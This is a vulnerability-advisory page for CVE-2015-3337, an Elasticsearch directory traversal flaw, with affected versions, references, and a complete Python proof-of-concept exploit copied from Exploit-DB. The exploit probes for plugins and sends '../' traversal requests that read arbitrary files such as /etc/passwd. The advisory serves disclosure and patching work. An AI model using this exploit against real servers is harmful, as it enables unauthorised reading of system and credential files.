CVE-2015-3337
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
5.3
Description
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
import socket, sys
print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
"Host: %s\n\n" % (plugin, fpath, host))
file = s.recv(2048)
print " [*] Trying to retrieve %s:" % fpath
if ("HTTP/1.0 200 OK" in file):
print "\n%s" % file
else:
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n"
"Host: %s\n\n" % (plugin, host))
file = s.recv(16)
print "[*] Trying to find plugin %s:" % plugin
if ("HTTP/1.0 200 OK" in file):
print "[+] Plugin found!"
grab(plugin)
sys.exit()
else:
print "[-] Not Found "
except Exception, e:
print "[-] Error connecting to %s: %s" % (host, e)
sys.exit()
# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
for plugin in pluginList:
pfind(plugin)Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Maven | org.elasticsearch:elasticsearch | <1.4.5 | 1.4.5 |
| Maven | org.elasticsearch:elasticsearch | >=1.5.0,<1.5.2 | 1.5.2 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| elasticsearch | elasticsearch | {"endIncluding":"1.4.4"} | |
| elasticsearch | elasticsearch | 1.5.0 | |
| elasticsearch | elasticsearch | 1.5.1 | |
References
- http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
- http://www.debian.org/security/2015/dsa-3241
- http://www.securityfocus.com/archive/1/535385
- http://www.securityfocus.com/bid/74353
- https://www.elastic.co/community/security
- https://www.exploit-db.com/exploits/37054/
- https://nvd.nist.gov/vuln/detail/CVE-2015-3337
- https://www.exploit-db.com/exploits/37054
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.